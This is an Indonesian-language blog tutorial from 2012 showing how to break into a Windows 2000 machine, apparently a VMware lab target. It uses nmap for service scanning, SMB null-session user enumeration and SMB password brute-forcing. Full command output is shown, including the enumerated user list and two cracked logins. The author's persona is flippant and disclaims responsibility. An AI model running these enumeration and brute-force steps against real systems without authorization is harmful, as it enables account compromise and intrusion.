Wednesday, 18 Jan 2012
Ok kita mulai aja dan perlu di ingat gw hanya menggunakan target yang victim, jadi apa pun resikonya gw gak nanggung, soalnya gw udah nanggung resikonya kemarin2,hahahha, jadi gw share aja dah.[0x01] scan dan userenum, di sini akan gw bahas bagaimana mendapatkan sebuah akses kedalam mesin target, tentunya target yang dimaksud adalah target yang bermesinkan atau berplatform windows. Yups, seperti judulnya yang diatas, langkah pertama adalah lakukan scanning terhadap mesin target, gunakan nmap untuk melakukan scanning, kenapa pake nmap gak yang lain sebab nmap banyak digunakan dan terbukti ampuh, dan apabila ada yang mau menggunakan scanner lain silahkan aja, gak ada yang larang.
kiddies@shellstr0m - nmap -sV 192.168.80.129
nah resultnya kayak gini :
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and
consistency reasons.
set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open msdtc?
1 service unrecognized despite returning data. If you know the service/version,
please submit the following
fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
SF:x\x01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds
Dari hasil scan tersebut, banyak sekali listing port yang terbuka dan kita bisa melihat server juga banyak menjalankan aplikasinya seperti,
IIS,NetBios,SMB, dan lain2. Nah, kebetulannya OS dari si server adalah windows 2000 dari sini kita bisa melakukan beberapa exploitasi
terhadap server dengan mengetahui beberapa port listing yang ada dari hasil scanning. Disini kita tau bahwa dari informasi yang ada, bahwa
netbios dan SMB pada windows 2000 memiliki vuln “NULL session” dengan mengijinkan kita untuk melakukan enumarasi ke semua acc yang ada.
cara melakukan userenum :
kiddies@shellstr0m - nmap --script=smb-enum-users 192.168.80.129
Hasil :
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor,
SERVER\Guest, SERVER\IUSR_SERVER,
SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary,
SERVER\molly, SERVER\None, SERVER\TsInternetUser
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
dari hasil diatas kita bisa tahu semua user dalam target system :
- Administrator
- Backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser
Untuk teknik lainnya silahkan cari sendiri ok. Untuk nge-brute pake nmap gunakan perintah ini :
kiddies@shellstr0m - nmap --script=smb-brute 192.168.80.129
Hasilnya :
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons.
set NMAPDIR=. to give priority to files in your local directory
(may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
done…alias selesai buat scanning dan mendapatkan usernya.